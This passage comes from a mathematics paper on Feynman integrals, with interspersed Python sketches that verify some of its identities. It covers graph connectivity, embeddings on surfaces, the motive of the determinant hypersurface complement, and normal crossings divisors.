Next, suppose that e 1 and e 2 have no endpoint in common. Let v 1 and w 1 be the endpoints of e 1 and v 2 and w 2 be the endpoints of e 2 . At least one pair {v i , w i } belongs to two separate components after the removal of the two edges, though not all four points can belong to different connected components, else the graph would not be 1PI. Suppose then that v 1 and w 1 are in different components. It also cannot happen that v 2 and w 2 belong to the same component, else the removal of e 1 alone would disconnect the graph. We can assume then that, say, v 2 belongs to the same component as v 1 while w 2 belongs to a different component (which may or may not be the same as that of w 1 ). Then the removal of v 1 and w 2 leaves v 2 and w 1 in two different components so that the graph is not 3-vertex-connected.
Remark 3.11. While the 2-edge-connected hypothesis on Feynman graphs is very natural from the physical point of view, since it is just the 1PI condition that arises when one considers the perturbative expansion of the effective action of the quantum field theory (cf. [22]), conditions of 3-connectivity (3-vertex-connected or 3-edge-connected) arise in a more subtle manner in the theory of Feynman integrals, in the analysis of Landau singularities (see for instance [29]). In particular, the 2PI effective action is often considered in quantum field theory in relation to non-equilibrium phenomena, see e.g. [28], §10.5.1.
3.3. Connectivity and embeddings. We now recall another property of graphs on surfaces, namely the face width of an embedding ι: Γ ↪ S. The face width fw(Γ, ι) is the largest number k ∈ ℕ such that every non-contractible simple closed curve in S intersects Γ at least k times. When S is a sphere, hence ι: Γ ↪ S is a planar embedding, one sets fw(Γ, ι) = ∞.
Remark 3.12. For a graph Γ with at least 3 vertices and with no looping edges, the condition that an embedding ι: Γ ↪ S is a closed 2-cell embedding is equivalent to the properties that Γ is 2-vertex-connected and that the embedding has face width fw(Γ, ι) ≥ 2; see Proposition 5.5.11 of [26].
In particular, this implies that a planar graph with at least three vertices and no looping edges admits a closed 2-cell embedding in the sphere if and only if it is 2-vertex-connected. Notice that the condition that Γ has at least 3 vertices and no looping edges is necessary for this statement to be true. For example, the graph with two vertices, one edge between them, and one looping edge attached to each vertex cannot be disconnected by removal of a single vertex, but does not have a closed 2-cell embedding in the sphere. Similarly, the graph consisting of two vertices, one edge between them and one looping edge attached to one of the vertices admits a closed 2-cell embedding in the sphere, but is not 2-vertex-connected. (See Figure 3.) It is not known whether every 2-vertex-connected graph Γ admits a closed 2-cell embedding. The "strong orientable embedding conjecture" states that this is the case, namely, that every 2-vertex-connected graph Γ admits a closed 2-cell embedding in some orientable surface S, of face width at least two (see [26], Conjecture 5.5.16).
We are now ready for the promised improvement of Lemma 3.5.
Proposition 3.13. Let Γ be a graph with at least 3 vertices and with no looping edges, which is closed-2-cell embedded in an orientable surface S. Then, if any two of the faces have at most one edge in common, the map τ is injective.
Proof. It suffices to show that, under these conditions on the graph Γ, the second condition of Lemma 3.5 is automatically satisfied, so that only the first condition remains to be checked. That is, we show that every edge of Γ is in the boundary of two faces.
Assume an edge is not in the boundary of two faces. Then that edge must bound the same face on both of its sides, as in Figure 4. The closure of the face is a cell, by assumption. Let γ be a path from one side of the edge to the other. Since γ splits the cell into two connected components, it follows that removing the edge splits Γ into two connected components, hence Γ is not 2-edge-connected. However, as recalled in Remark 3.12, the fact that Γ has at least 3 vertices and no looping edges and it admits a closed 2-cell embedding implies that Γ is 2-vertex-connected, hence in particular it is 1PI by the first part of Lemma 3.9, and this gives a contradiction.
The condition that Γ has at least 3 vertices and no looping edges is necessary for Proposition 3.13. For example, the second graph shown in Figure 3 does not satisfy the property that each edge is in the boundary of two faces; in the case of this graph, clearly the map τ is not injective.
Here is another direct consequence of the previous embedding results.

Proposition 3.14. Let Γ be a 3-edge-connected graph with at least 3 vertices and no looping edges, admitting a closed 2-cell embedding ι: Γ ↪ S with face width fw(Γ, ι) ≥ 3. Then the map τ is injective.

Proof. The result of Proposition 3.13 shows that the second condition stated in Lemma 3.5 is automatically satisfied, so the only thing left to check is that the first condition stated in Lemma 3.5 holds. Assume that two faces F₁, F₂ have more than one edge in common, see Figure 5. Since F₁, F₂ are (path-)connected, there are paths γᵢ in Fᵢ connecting corresponding sides of the edges. With suitable care, it can be arranged that γ₁ ∪ γ₂ is a closed path γ meeting Γ in 2 points, see Figure 5. Since the embedding has face width ≥ 3, γ must be null-homotopic in the surface, and in particular it splits it into two connected components. This implies that Γ is split into two connected components by removing the two edges, hence Γ cannot be 3-edge-connected.
The 3-edge-connectivity hypothesis in Proposition 3.14 can be viewed as the next step strengthening of the 1PI condition, cf. Remark 3.11. Similarly, the condition of the face width of the embedding f w(Γ, ι) ≥ 3 is the next step strengthening of the condition f w(Γ, ι) ≥ 2 conjecturally implied by 2-vertex-connectivity.
In fact, if we enhance in Proposition 3.14 the 3-edge-connected hypothesis with 3-vertex-connectivity (see Lemma 3.10), we can refer to a result of graph theory ([26], Proposition 5.5.12), which shows that for a 3-vertex-connected graph it is equivalent to admit an embedding with fw(Γ, ι) ≥ 3 and to have the wheel neighborhood property, that is, every vertex of Γ has a wheel neighborhood. Another equivalent condition to fw(Γ, ι) ≥ 3 for a 3-vertex-connected graph is that the loops determined by the faces of the embedding as in Lemma 3.4 are either disjoint or their intersection is just a vertex or a single edge ([26], Proposition 5.5.12). For example, we can formulate an analog of Proposition 3.14 in the following way.

Corollary 3.15. Let Γ be a 3-vertex-connected graph, with no looping edges and no multiple edges, such that every vertex of Γ has a wheel neighborhood. Then the map τ is injective.

The results derived in this section thus identify classes of graphs that satisfy simple geometric properties for which the injectivity of the map τ holds.
3.4. Dependence on Γ. The preceding results refer to the injectivity of the maps τ_i, τ determined by a given graph Γ, where τ maps an affine space A^n (where n is the number of internal edges of Γ) to A^{ℓ²} (where ℓ is the number of loops of Γ), by means of the matrix M_Γ(t). The whole matrix M_Γ(t) depends of course on the graph Γ. However, the injectivity of τ may be detected by a suitable submatrix. In the following statement, choose a basis for H_1(Γ, Z) as prescribed in Lemma 3.4; thus, f − 1 = ℓ − 2g rows of M_Γ(t) correspond to the 'internal' faces in an embedding of Γ.

Lemma 3.16. Let Γ be a graph satisfying the hypotheses of Proposition 3.13 or Proposition 3.14. Then the injectivity of the map τ is determined by the (ℓ − 2g) × (ℓ − 2g) minor of M_Γ(t) whose rows and columns correspond to the internal faces of the embedding.

Proof. Indeed, under the given assumptions, every edge appears in the loop corresponding to some internal face of the embedding. The argument proving Lemma 3.5 shows that the given minor determines the injectivity of τ.
A further refinement of the foregoing considerations will allow us to obtain statements that will be to some extent independent of Γ, and only hinge on ℓ = b 1 (Γ) and the genus g of Γ.
We have pointed out earlier ( §2.1) that det M Γ (t) does not depend on the choice of orientation for the loops of Γ. It is however advantageous to make a coherent choice for these orientations. We are now assuming that we have chosen a closed 2-cell embedding of Γ into an orientable surface of genus g; such an embedding has f faces, where ℓ = 2g+f −1; we can arrange M Γ (t) so that the first f − 1 rows correspond to the f − 1 loops determined by the 'internal' faces of the embedding.
On each face, choose the positive orientation (counterclockwise with respect to an outgoing normal vector). Then each edge-variable in common between two faces i, j will appear with a minus sign in the entries (i, j) and (j, i) of M_Γ(t). These entries are both in the (ℓ − 2g) × (ℓ − 2g) upper-left minor, which is the minor singled out in Lemma 3.16.
The upshot is that in the cases covered by the above results (such as Proposition 3.13), the edge variables t_e can all be obtained by pulling back either entries −x_{ij} with 1 ≤ i < j ≤ ℓ − 2g, or row sums x_{i1} + · · · + x_{i,ℓ−2g} with 1 ≤ i ≤ ℓ − 2g. Note that these expressions only depend on ℓ and g; it follows that all components of the image τ(∂σ_n) in A^{ℓ²} of the boundary of the simplex σ_n can be realized as pull-backs of subspaces of A^{ℓ²} from a list which only depends on the number ℓ − 2g (= f − 1, where f is the number of faces in a closed 2-cell embedding of Γ). This observation essentially emancipates the domain of integration in the integral appearing in the statement of Lemma 2.3 from the specific graph Γ.
We will return to this point in §5, cf. Proposition 5.2.
3.5. More general graphs. The previous combinatorial statements were obtained under the assumption that the graphs have no looping edges. However, the statement can then be generalized easily to the case with looping edges using the following observation.

Lemma 3.17. Let Γ be a graph obtained by attaching a looping edge at a vertex of a graph Γ′. Then the map τ for Γ is injective if and only if it is injective for Γ′.

Proof. Let t be the variable assigned to the looping edge and t_e the variables assigned to the edges of Γ′. Choosing the looping edge as the first element of a basis of H_1(Γ, Z), the matrix M_Γ(t, t_e) is of the block diagonal form

M_Γ(t, t_e) = ( t   0
                0   M_{Γ′}(t_e) ),

with the 1 × 1 block t corresponding to the looping edge. This proves the statement.
This allows us to extend the results of Proposition 3.14 and Corollary 3.15 to all graphs obtained by attaching an arbitrary number of looping edges at the vertices of a graph satisfying the hypothesis of Proposition 3.14 or Corollary 3.15.
Corollary 3.18. Let Γ be a graph such that, after removing all the looping edges, the remaining graph is 3-vertex-connected with a wheel neighborhood at each vertex. Then the maps τ i , τ are all injective.
We can further extend the class of graphs to which the results of this section apply by including those graphs that are obtained from graphs satisfying the hypotheses of Proposition 3.13, Proposition 3.14, Corollary 3.15, or Corollary 3.18 by subdividing edges.
Let e_n be the edge of Γ that is subdivided into two edges e′_n and e″_n to form the graph Γ′. The effect on the graph polynomial is

Ψ_{Γ′}(t_1, . . . , t_{n−1}, t′_n, t″_n) = Ψ_Γ(t_1, . . . , t_{n−1}, t′_n + t″_n),

since the spanning trees of Γ′ are obtained by adding either e′_n or e″_n to those spanning trees of Γ that do not contain e_n, and by replacing e_n with e′_n ∪ e″_n in the spanning trees of Γ that contain e_n. Notice that in this case the injectivity of the map τ is not preserved by the operation of splitting edges. However, one can check directly that this operation does not affect the nature of the period computed by the Feynman integral, as the following result shows, so that any result showing that the Feynman integral is a period of a mixed Tate motive for a class of graphs with no valence-two vertices will automatically extend to graphs obtained by splitting edges.
Proposition 3.19. Let Γ′ be a graph obtained from a given graph Γ by subdividing one of the edges by inserting a valence-two vertex. Then the parametric Feynman integral for Γ′ will be of the form

(3.1)   C ∫_{σ_n} Ψ_Γ(t)^{−D/2} V_Γ(t, p)^{−(n+1)+Dℓ/2} t_n ω_n,

where C is a ratio of Gamma-factors.

Proof. When one subdivides an edge as above, the Feynman rules imply that one finds as corresponding Feynman integral an expression of the form

∫ δ(k_n − k_{n+1}) / (q_1(k_1) · · · q_{n−1}(k_{n−1}) q_n(k_n) q_n(k_{n+1})) d^D k_1 · · · d^D k_{n+1},

where the q_i(k_i) = k_i² + m² are the quadratic forms that give the propagators associated to the internal edges of the graph. We have used the constraint δ(k_n − k_{n+1}) for the two momentum variables associated to the two parts of the split edge, so that we find q_n² in the denominator. One then uses the usual formula

1/(q_1^{a_1} · · · q_n^{a_n}) = (Γ(a_1 + · · · + a_n) / (Γ(a_1) · · · Γ(a_n))) ∫_{σ_n} t_1^{a_1−1} · · · t_n^{a_n−1} dt_1 · · · dt_n / (t_1 q_1 + · · · + t_n q_n)^{a_1+···+a_n}

to obtain the parametric form of the Feynman integral. In our case this gives

1/(q_1 · · · q_{n−1} q_n²) = n! ∫_{σ_n} t_n dt_1 · · · dt_n / (t_1 q_1 + · · · + t_n q_n)^{n+1}.

Thus, one obtains the parametric form of the Feynman integral as in the case of the original graph Γ, with ω_n replaced by t_n ω_n and the power of V_Γ(t, p) shifted by one. This gives (3.1).
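As a quick plausibility check, the Feynman-parameter identity used in the proof can be verified symbolically in its smallest instance, n = 2, where it reads 1/(q_1 q_2²) = 2 ∫₀¹ t dt / ((1 − t) q_1 + t q_2)³ after parametrizing σ_2 by t_1 = 1 − t, t_2 = t. The following sketch is ours, not part of the paper, and assumes a Python environment with SymPy available.

import sympy as sp

# Verify 1/(q1*q2^2) = 2! * Integral_{sigma_2} t2 dt / (t1 q1 + t2 q2)^3,
# with sigma_2 parametrized by t1 = 1 - t, t2 = t, t in [0, 1].
t = sp.symbols('t', nonnegative=True)
q1, s = sp.symbols('q1 s', positive=True)
q2 = q1 + s  # take q2 > q1 to stay off the degenerate q1 = q2 branch

rhs = sp.factorial(2) * sp.integrate(t / ((1 - t) * q1 + t * q2) ** 3, (t, 0, 1))
assert sp.simplify(rhs - 1 / (q1 * q2 ** 2)) == 0
print(sp.simplify(rhs))  # equals 1/(q1*q2**2)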
In particular Proposition 3.19 shows that the parametric Feynman integral for the graph Γ′ is still a period of the same type as that of the graph Γ, since it is still a period associated to the complement of the graph hypersurface X̂_Γ and evaluated over the same simplex σ_n. Only the algebraic differential form changes from Ψ_Γ^{−D/2} V_Γ(t, p)^{−n+Dℓ/2} ω_n to Ψ_Γ^{−D/2} V_Γ(t, p)^{−(n+1)+Dℓ/2} t_n ω_n, but this does not affect the nature of the period, at least in the "stable range" where D is sufficiently large (Dℓ/2 > n).
The motive of the determinant hypersurface complement
Our work in §2 and §3 relates the complexity of a Feynman integral over a graph satisfying suitable combinatorial conditions to the complexity of the motive whose realizations give the relative cohomology of the pair of the complement of the determinant hypersurface and a normal crossings divisor Σ̂_Γ containing the image of the boundary τ_Γ(∂σ_n), as in Lemma 5.1 below (see Corollary 2.4, Proposition 3.13 and ff.). In this section we exhibit an explicit filtration of the complement of the determinant hypersurface, from which we can directly prove that the motive of A^{ℓ²} ∖ D̂_ℓ is mixed Tate. We use this filtration to compute explicitly the class of A^{ℓ²} ∖ D̂_ℓ in the Grothendieck group of varieties, as well as the class of the projective version P^{ℓ²−1} ∖ D_ℓ. Notice that the mixed Tate nature of the motive of the determinant hypersurface complement also follows directly from the results of Belkale–Brosnan [3], or from those of Biglari [5], [6], but we prefer to give here a very explicit computation, which will be useful as a preliminary for the similar but more involved analysis of the loci that contain the boundary of the domain of integration that we discuss in the following sections.
4.1. The motive. As we already argued, it is more natural to consider the graph hypersurfaces X̂_Γ in the affine space A^n, instead of the projective X_Γ in P^{n−1}. Thus, here also we work with the affine space A^{ℓ²} parametrizing ℓ × ℓ matrices. The cone D̂_ℓ over the determinant hypersurface consists of matrices of rank < ℓ. Realizing the complement of D̂_ℓ in A^{ℓ²} amounts then to 'parametrizing' matrices M of rank exactly ℓ.
It is clear how this should be done:
- The first row of M must be a nonzero vector v_1;
- The second row of M must be a vector v_2 that is nonzero modulo v_1;
- The third row of M must be a vector v_3 that is nonzero modulo v_1 and v_2;
- And so on.
To formalize this construction, let E be a fixed ℓ-dimensional vector space, and work inductively. The first steps of the construction are as follows.
- Denote by W_1 the variety E ∖ {0};
- Note that W_1 is equipped with a trivial vector bundle E_1 = E × W_1, and with a line bundle S_1 := L_1 ⊆ E_1 whose fiber over v_1 ∈ W_1 consists of the line spanned by v_1;
- Let W_2 ⊆ E_1 be the complement E_1 ∖ L_1;
- Note that W_2 is equipped with a trivial vector bundle E_2 = E × W_2, and two line subbundles of E_2: the pull-back of L_1 (still denoted L_1) and the line bundle L_2 whose fiber over v_2 ∈ W_2 consists of the line spanned by v_2;
- By construction, L_1 and L_2 span a rank-2 subbundle S_2 of E_2;
- Let W_3 ⊆ E_2 be the complement E_2 ∖ S_2;
- And so on.
Inductively: at the k-th step, this procedure produces a variety W_k, endowed with k line bundles L_1, . . . , L_k spanning a rank-k subbundle S_k of the trivial vector bundle E_k = E × W_k. Let W_{k+1} ⊆ E_k be the complement E_k ∖ S_k, endowed with the trivial vector bundle E_{k+1} = E × W_{k+1}, and define line subbundles L_1, . . . , L_k to be the pull-backs of the like-named line bundles on W_k; and let L_{k+1} be the line bundle whose fiber over v_{k+1} is the line spanned by v_{k+1}. The line bundles L_1, . . . , L_{k+1} span a rank-(k+1) subbundle S_{k+1} of E_{k+1}, and the construction can continue. The sequence stops at the ℓ-th step, where S_ℓ has rank ℓ, equal to the rank of E_ℓ, so that E_ℓ ∖ S_ℓ = ∅.
Lemma 4.1. The variety W_ℓ constructed as above is isomorphic to A^{ℓ²} ∖ D̂_ℓ.
Proof. Each variety W_k maps to A^{ℓ²} as follows: a point of W_k determines k vectors v_1, . . . , v_k, and can be mapped to the matrix whose first k rows are v_1, . . . , v_k, respectively (and the remaining rows are 0). By construction, this matrix has rank exactly k. Conversely, any such rank-k matrix is the image of a point of W_k, by construction.
In particular, we have the following result on the bundles S k involved in the construction described above.
Lemma 4.2. The bundle S k over the variety W k is trivial for all 1 ≤ k ≤ ℓ.
Proof. Points of W_k are parameterized by k-tuples of vectors v_1, . . . , v_k spanning S_k ⊆ K^ℓ × W_k = E_k. This means precisely that the map W_k × K^k → S_k sending ((v_1, . . . , v_k), (a_1, . . . , a_k)) to a_1 v_1 + · · · + a_k v_k is an isomorphism of vector bundles, trivializing S_k.

Recall that, given a triangulated category D, a full subcategory D′ is a triangulated subcategory if and only if it is invariant under the shift T of D and, for any distinguished triangle A → B → C → A[1], whenever two of the objects A, B, C are isomorphic to objects of D′, so is the third. Let MD_K be the Voevodsky triangulated category of mixed motives over a field K, [33]. The triangulated category DMT_K of mixed Tate motives is the full triangulated thick subcategory of MD_K generated by the Tate objects Q(n). It is known that, over a number field K, there is a canonical t-structure on DMT_K and one can therefore construct an abelian category MT_K of mixed Tate motives (see [24]).
We then have the following result on the nature of the motive of the determinant hypersurface complement.

Proposition 4.3. The motive m(A^{ℓ²} ∖ D̂_ℓ) is an object of the triangulated category DMT_Q of mixed Tate motives.

Proof. First recall that by Proposition 4.1.4 of [33], over a field K of characteristic zero a closed embedding Y ⊂ X determines a distinguished triangle

m(Y) → m(X) → m(X ∖ Y) → m(Y)[1]

in MD_K. Here we use the notation m(X) for the motivic complex with compact support denoted by C^c_*(X) in [33]. In particular, if m(Y) and m(X) are in DMT_K then m(X ∖ Y) is isomorphic to an object in DMT_K, by the property of full triangulated subcategories recalled above. Similarly, using the invariance of DMT_K under the shift, if m(Y) and m(X ∖ Y) are in DMT_K then m(X) is isomorphic to an object in DMT_K.
We also know (see §1.2.3 of [8]) that in the Voevodsky category MD_K one inverts the morphism X × A¹ → X induced by the projection, so that taking the product with an affine space A^k is an isomorphism at the level of the corresponding motives; for the motivic complexes with compact support this gives m(X × A¹) = m(X)(−1)[2], see Corollary 4.1.8 of [33]. Thus, for any given m(X) in DMT_K, the motive m(X × A^k) is obtained from m(X) by Tate twists and shifts, hence it is also in DMT_K.
These two properties of the derived category DMT_K of mixed Tate motives suffice to show that the motive of the affine hypersurface complement A^{ℓ²} ∖ D̂_ℓ is mixed Tate. In fact, one sees from the inductive construction of A^{ℓ²} ∖ D̂_ℓ described above that at each step we are dealing with varieties defined over K = Q, and we now show that, at each step, the corresponding motives are mixed Tate. Single points obviously belong to the category of mixed Tate motives. At the first step, one takes the complement W_1 of a point in an affine space, which gives a mixed Tate motive by the first observation above on distinguished triangles associated to closed embeddings. At the next step one considers the complement of the line bundle S_1 inside the trivial vector bundle E_1 over W_1. Again, both m(S_1) and m(E_1) are mixed Tate motives, since both bundles are products by affine spaces by Lemma 4.2 above, hence m(E_1 ∖ S_1) is also mixed Tate. The same argument shows that, for all 1 ≤ k ≤ ℓ, the motive m(E_k ∖ S_k) is mixed Tate, by repeatedly using Lemma 4.2 and the two properties of DMT_Q recalled above.
4.2. The class in the Grothendieck ring. Lemma 4.1 suffices to obtain an explicit formula for the class in the Grothendieck ring of varieties of the complement of the determinant hypersurface. This is of course well known: see for example [3], §3.3.
Proposition 4.4. In the affine case the class in the Grothendieck ring of varieties is

(4.2)   [A^{ℓ²} ∖ D̂_ℓ] = ∏_{k=0}^{ℓ−1} (L^ℓ − L^k),

where L is the class of A¹. In the projective case, the class is

(4.3)   [P^{ℓ²−1} ∖ D_ℓ] = (1/(L − 1)) ∏_{k=0}^{ℓ−1} (L^ℓ − L^k).

Proof. Using Lemma 4.1 one sees inductively that the class of W_k is given by [W_k] = ∏_{i=0}^{k−1} (L^ℓ − L^i): at each step, the choice of the next row is a point of the complement of the rank-i bundle S_i in the trivial bundle E_i, contributing a factor L^ℓ − L^i. Since D̂_ℓ is the affine cone over D_ℓ, the projective class is obtained by dividing the affine one by the class L − 1 of the rescalings. This completes the proof.
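The formula (4.2) admits an elementary sanity check by point-counting: substituting the cardinality q of a finite field for L, the class must count the invertible ℓ × ℓ matrices over F_q. The brute-force sketch below (ours, not from the paper) confirms this for ℓ = 2, 3 and q = 2, 3.

from itertools import product

def rank_mod_p(rows, p):
    # Gaussian elimination over the prime field F_p; returns the rank.
    m = [list(r) for r in rows]
    rank = 0
    for col in range(len(m[0])):
        piv = next((r for r in range(rank, len(m)) if m[r][col] % p), None)
        if piv is None:
            continue
        m[rank], m[piv] = m[piv], m[rank]
        inv = pow(m[rank][col], p - 2, p)  # inverse of the pivot (p prime)
        m[rank] = [(x * inv) % p for x in m[rank]]
        for r in range(len(m)):
            if r != rank and m[r][col] % p:
                f = m[r][col]
                m[r] = [(x - f * y) % p for x, y in zip(m[r], m[rank])]
        rank += 1
    return rank

for l in (2, 3):
    for q in (2, 3):
        count = sum(
            1
            for entries in product(range(q), repeat=l * l)
            if rank_mod_p([entries[i * l:(i + 1) * l] for i in range(l)], q) == l
        )
        formula = 1
        for k in range(l):
            formula *= q ** l - q ** k
        assert count == formula
        print(f"l={l}, q={q}: {count} matrices of maximal rank")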
The class (4.2) can be written equivalently in the form

[A^{ℓ²} ∖ D̂_ℓ] = L^{ℓ(ℓ−1)/2} T^ℓ [P¹] · · · [P^{ℓ−1}],

where L = [A¹] and T = [G_m] is the class of the multiplicative group. Here the motive L^{ℓ(ℓ−1)/2} T^ℓ [P¹] · · · [P^{ℓ−1}] can be thought of as the motive of the "variety of frames".
(Note however that, for ℓ ≥ 5, coefficients other than 0, ±1 appear in the class.) Thus, the class [D_ℓ] is given, for ℓ = 2 and ℓ = 3, by the expressions

[D_2] = L² + 2L + 1 = [P¹ × P¹],
[D_3] = L⁷ + 2L⁶ + 2L⁵ + L⁴ + L² + L + 1.

The ℓ = 2 case is otherwise evident: D_2 is the set of rank-1, 2 × 2 matrices, and as such it may be realized as P¹ × P¹, with the indicated class. The ℓ = 3 case can also be easily verified independently.
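The displayed class of D_3 can likewise be checked by counting points over small finite fields: the projective points of D_3 over F_q are the singular 3 × 3 matrices, minus the origin, divided by the q − 1 rescalings. The short sketch below (ours) matches this count against the polynomial above at L = q.

# Check [D_3] = L^7 + 2L^6 + 2L^5 + L^4 + L^2 + L + 1 by counting over F_q.
for q in (2, 3):
    gl3 = (q**3 - 1) * (q**3 - q) * (q**3 - q**2)  # invertible matrices, by (4.2)
    cone = q**9 - gl3                               # affine cone over D_3
    projective_points = (cone - 1) // (q - 1)       # remove origin, mod scaling
    klass = q**7 + 2*q**6 + 2*q**5 + q**4 + q**2 + q + 1
    assert projective_points == klass
    print(q, projective_points)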
Relative cohomology and mixed Tate motives
We now assume that Γ is a graph satisfying the condition studied in §2 and §3: the map τ is injective. By Proposition 3.13, this is the case if Γ has at least 3 vertices, no looping edges, and is closed-2-cell embedded in an orientable surface in such a way that any two of the faces determined by the embedding have at most one edge in common. Proposition 3.14 and Corollary 3.15 provide us with specific combinatorial conditions ensuring that this is the case. For instance, all 3-edge-connected planar graphs are included in this class.
Also note that by the considerations in §3.5 (especially Lemma 3.17 and Proposition 3.19), any estimate for the complexity of Feynman integrals for graphs satisfying these conditions generalizes automatically to the larger class of graphs obtained from those considered here by adding arbitrarily many looping edges, and by arbitrarily subdividing edges.
5.1. Algebraic simplexes and normal crossing divisors.
In our setting and under the injectivity assumption, the property that the Feynman integral (1.9) is a period of a mixed Tate motive (modulo divergences) would follow from showing that a certain relative cohomology is a realization of a mixed Tate motive. Instead of the relative cohomology H^{n−1}(P^{n−1} ∖ X_Γ, Σ_n ∖ (Σ_n ∩ X_Γ)) considered in [10], [9], we consider here a different relative cohomology, where the hypersurface complement P^{n−1} ∖ X_Γ is replaced by the complement P^{ℓ²−1} ∖ D_ℓ of the determinant hypersurface, or better its affine counterpart A^{ℓ²} ∖ D̂_ℓ, and instead of the algebraic simplex Σ_n = {t : t_1 · · · t_n = 0}, we consider a locus Σ̂_Γ in A^{ℓ²} that pulls back to the algebraic simplex Σ_n under the map τ of (2.10) and that consists of a union of n linear subspaces of codimension one in A^{ℓ²} that meet the image of A^n under τ along divisors with normal crossings. The following observation is a direct consequence of the construction of the matrix M_Γ(t) (cf. §2.1).
Lemma 5.1. Suppose given a graph Γ such that the corresponding maps τ and τ_i are injective. Then the n coordinates t_i associated to the internal edges of Γ can be written as preimages, via the (injective) map τ : A^n → A^{ℓ²}, of n linear subspaces X_i of codimension 1 in A^{ℓ²}. These n subspaces form a divisor Σ̂_Γ with normal crossings in A^{ℓ²}.
Proof. Consider the various possible cases for a specific edge listed in Lemma 2.2. In the third case listed there, where there are two loops ℓ i , ℓ j containing e, and not having any other edge in common, the variable t e is immediately expressed as the pullback to A n of a coordinate in A ℓ 2 . Consider then the second case listed in Lemma 2.2, where an edge e belongs to a single loop ℓ i . Under the assumption that the map τ i is injective, then any linear combination of the variables corresponding to the edges in the i-th loop may be written as a linear combination of coordinates of the i-th row.
The considerations in §3.4 allow us to improve this observation, by passing to a larger normal crossings divisor, so that one can generate all the Σ̂_Γ from the components of a single normal crossings divisor Σ̂_{ℓ,g} that only depends on the number of loops of the graph and on the minimal genus of the embedding of the graph on a Riemann surface. We formalize this remark as follows.
Proposition 5.2. There exists a normal crossings divisor Σ̂_{ℓ,g} ⊂ A^{ℓ²}, which is a union of N = f(f − 1)/2 linear spaces,

(5.1)   Σ̂_{ℓ,g} := X_1 ∪ · · · ∪ X_N,

such that, for all graphs Γ with ℓ loops and a genus-g closed 2-cell embedding, the preimage under τ = τ_Γ of the union Σ̂_Γ of a subset of components of Σ̂_{ℓ,g} is the algebraic simplex Σ_n in A^n. More explicitly, the divisor Σ̂_{ℓ,g} can be described by the N = f(f − 1)/2 equations

(5.2)   x_{ij} = 0, for 1 ≤ i < j ≤ ℓ − 2g,   and   x_{i1} + · · · + x_{i,ℓ−2g} = 0, for 1 ≤ i ≤ ℓ − 2g,

where f = ℓ − 2g + 1 is the number of faces of the embedding.
Proof. Using Lemma 3.16, we know that an (ℓ − 2g) × (ℓ − 2g) minor of the matrix M_Γ suffices to control the injectivity of the map τ. We can in fact arrange so that the minor is the upper-left part of the ℓ × ℓ ambient matrix. Then, as in Lemma 5.1, the hyperplanes in A^n associated to the coordinates t_i can be obtained by pulling back linear spaces along this minor. On the diagonal of the (f − 1) × (f − 1) submatrix we find the sum of all the edges making up each face, with a positive sign. It follows that the pull-backs of the equations (5.2) produce a list of all the edge variables, possibly with redundancies. The components of Σ̂_{ℓ,g} that form the divisor Σ̂_Γ are selected by eliminating those components of Σ̂_{ℓ,g} that contain the image of the graph hypersurface (i.e., those coming from the zero entries of the matrix M_Γ(t)).
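For concreteness, the components of Σ̂_{ℓ,g} prescribed by (5.2) can be enumerated mechanically. The small sketch below (ours, not from the paper) lists them for ℓ = 3, g = 0, reproducing the six components X_1, . . . , X_6 used again in §6.3.

from itertools import combinations

def divisor_components(l, g):
    # Equations (5.2): entries x_ij = 0 for i < j, plus the row sums,
    # for indices up to l - 2g = f - 1 (the number of internal faces).
    m = l - 2 * g
    comps = [f"x_{i}{j} = 0" for i, j in combinations(range(1, m + 1), 2)]
    comps += [" + ".join(f"x_{i}{j}" for j in range(1, m + 1)) + " = 0"
              for i in range(1, m + 1)]
    return comps

for eq in divisor_components(3, 0):  # the N = 6 components for l = 3, g = 0
    print(eq)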
Thus, for every Γ satisfying the conditions recalled at the beginning of the section (for example, every 3-edge-connected planar graph, or every graph obtained from one of these by adding looping edges or subdividing edges), the nature of the period appearing as a Feynman integral over Γ, in the sense explained in §2, is controlled by the motive for a normal crossings divisor Σ̂_Γ ⊂ A^{ℓ²} consisting of a subset of components of the fixed (for given ℓ and g) normal crossings divisor Σ̂_{ℓ,g} ⊂ A^{ℓ²} introduced above. More explicitly, the boundary of the topological simplex σ_n, that is, the domain of integration of the Feynman integral in Lemma 2.3, satisfies τ_Γ(∂σ_n) ⊂ Σ̂_Γ. Thus, the main goal here will be to understand the motivic nature of the complement Σ̂_Γ ∖ (D̂_ℓ ∩ Σ̂_Γ) and of the corresponding relative motive

(5.3)   m(A^{ℓ²} ∖ D̂_ℓ, Σ̂_Γ ∖ (D̂_ℓ ∩ Σ̂_Γ)).

Since Σ̂_Γ consists of components from the fixed normal crossings divisor Σ̂_{ℓ,g}, this question will be recast in terms that only depend on ℓ and g: we show in Corollary 5.4 below that, using the inclusion-exclusion principle applied to the components of Σ̂_{ℓ,g}, it is possible to answer these questions simultaneously for all the divisors Σ̂_Γ, for all graphs with ℓ loops and genus g, by investigating the nature of a motive constructed out of the intersections of the components of the divisor Σ̂_{ℓ,g}.
There are general and explicit conditions (see [18], Proposition 3.6) implying that the relative cohomology of a pair (X, Y) comes from a mixed Tate motive m(X, Y) (see also [19] for a concrete application to the geometric case of moduli spaces of curves). In general, these rely on assumptions on the divisors involved and their associated stratification, which may not directly apply to the cases considered here. We discuss here a direct approach to constructing stratifications of our loci Σ̂_{ℓ,g} ∖ (D̂_ℓ ∩ Σ̂_{ℓ,g}) that can be used to investigate the nature of the motive (5.3).
5.2. Inclusion-exclusion. The procedure we follow will be the one outlined above, based on the divisors Σ̂_{ℓ,g} and the inclusion-exclusion principle. Since we already know by the results of §4 that the complement X = A^{ℓ²} ∖ D̂_ℓ is a mixed Tate motive, we aim at providing a direct argument showing that Y = Σ̂_Γ ∖ (Σ̂_Γ ∩ D̂_ℓ) also is a mixed Tate motive. The same argument used in §4, based on the distinguished triangles in the Voevodsky triangulated category of mixed Tate motives [33], would then show that the relative cohomology of the pair (X, Y) comes from an object m(X, Y) ∈ Obj(DMT_Q).
As a first step we transform the problem of a complement in a union of linear spaces into an equivalent formulation in terms of intersections of linear spaces, using inclusion-exclusion. For a collection {Z_i} of varieties Z_i, i ∈ {1, . . . , m}, we set

Z°_I := (∩_{i∈I} Z_i) ∖ (∪_{j∉I} Z_j),

for nonempty I ⊆ {1, . . . , m}, so that Z_1 ∪ · · · ∪ Z_m = ⊔_{I≠∅} Z°_I. This is a disjoint union. We then have the following result.

Lemma 5.3. Let Z_1, . . . , Z_m be varieties; assume that the intersections ∩_{i∈I} Z_i are mixed Tate, for all nonempty I ⊆ {1, . . . , m}. Then Z_1 ∪ · · · ∪ Z_m is mixed Tate.
